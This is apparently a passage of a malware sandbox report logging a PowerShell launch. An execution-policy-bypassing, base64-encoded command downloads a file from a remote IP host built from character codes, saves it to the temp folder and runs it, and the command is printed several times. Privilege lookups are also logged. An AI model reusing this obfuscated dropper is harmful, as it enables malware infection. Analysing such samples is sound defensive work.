AcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g "
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\SYSTeM32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe
parameters: "PowErShell -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g "
filepath: C:\Windows\System32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\IBmSentos
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAA